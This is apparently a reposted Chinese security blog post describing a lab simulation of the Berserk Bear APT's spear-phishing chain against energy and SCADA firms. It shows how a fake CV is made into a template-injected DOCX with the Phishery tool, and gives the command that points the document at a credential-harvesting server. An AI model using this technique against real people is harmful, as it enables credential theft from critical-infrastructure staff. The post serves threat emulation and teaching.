Berserk Bear APT 攻击模拟

admin 2025年1月3日09:14:54评论13 views字数 1309阅读4分21秒阅读模式

这是对 (Berserk Bear) APT 集团针对全球关键基础设施和能源公司的攻击的模拟,主要是在欧洲和美国,攻击活动至少从 2017 年 5 月开始活跃。这种攻击既针对关键基础设施提供商,也针对这些提供商用来提供关键服务的供应商,攻击链从恶意(XML 容器)注入连接到外部服务器的 DOCX 文件 (SMB) 开始,用于静默收集用户凭据,并被用于鱼叉式网络钓鱼攻击。我依靠 Cisco Talos Intelligence Group 来弄清楚进行此模拟的细节:https://blog.talosintelligence.com/template-injection/

Berserk Bear APT 攻击模拟Berserk Bear APT 攻击模拟

如果您需要了解更多关于 Berserk Bear APT 群组攻击的信息:https://apt.etda.or.th/cgi-bin/showcard.cgi?g=Berserk%20Bear%2C%20Dragonfly%202%2E0&n=1

这次攻击包括几个阶段,包括注入 DOCX 文件和使用恶意 XML 容器,该容器创建特定警报以获取凭据并传输到攻击者的服务器,然后他们使用该服务器为鱼叉式网络钓鱼攻击所针对的组织获取数据。DOCX 文件是一份简历,提交给在软件开发和 SCADA 控制系统方面具有十年经验的人。

  1. 创建 CV DOCX 文件,该文件将被注入并发送鱼叉式网络钓鱼。

2. 使用网络钓鱼工具注入 DOCX 文件以获取凭据。

3. 凭据网络钓鱼是指目标打开目标 Word 文件并在将向他们显示的通知中输入凭据。

第一阶段(分娩技术)

由于这里的攻击者想以 SCADA 等能源和能源管理系统相关的机构为目标,因此攻击者以简历的形式创建了一个 DOCX 文件来申请工作。似乎有这样的职位空缺,攻击者发送了包含恶意 XML 容器的简历,在这里我创建了一个与他们在实际攻击中使用的简历相同的简历。

Berserk Bear APT 攻击模拟Berserk Bear APT 攻击模拟

第二阶段(植入技术)

根据思科 Talos 情报小组所说,攻击者努力通过网络钓鱼工具注入 DOCX 文件,这是因为在这次攻击时它是一个很久没有发布的工具,这是攻击者利用它最多的地方,也有可能在使用它之前进行了一些修改这次攻击。

Berserk Bear APT 攻击模拟Berserk Bear APT 攻击模拟

Phishery 是一个启用了 Simple SSL 的 HTTP 服务器,其主要目的是通过基本身份验证来获取网络钓鱼凭据。Phishery 还提供了将 URL 轻松注入 .docx Word 文档的功能。

Github 存储库:https://github.com/ryhanson/phishery.git

Berserk Bear APT 攻击模拟Berserk Bear APT 攻击模拟

sudo apt-get install phishery

网络钓鱼 -u https://192.168.138.138 -i CV.docx -o malicious.docx

网络钓鱼

现在,恶意 CV 将被发送到目标并等待 Credentials。

第三阶段(执行技术)

凭据网络钓鱼是指目标打开目标 Word 文件并在将向他们显示的通知中输入凭据。

Berserk Bear APT 攻击模拟Berserk Bear APT 攻击模拟

Github 存储库:https://github.com/S3N4T0R-0X0/APT-Attack-Simulation/blob/main/Russian%20APT%2FBerserk-Bear-APT%2FREADME.md

 

原文始发于微信公众号(安全狗的自我修养):Berserk Bear APT 攻击模拟

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月3日09:14:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Berserk Bear APT 攻击模拟https://cn-sec.com/archives/3587197.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息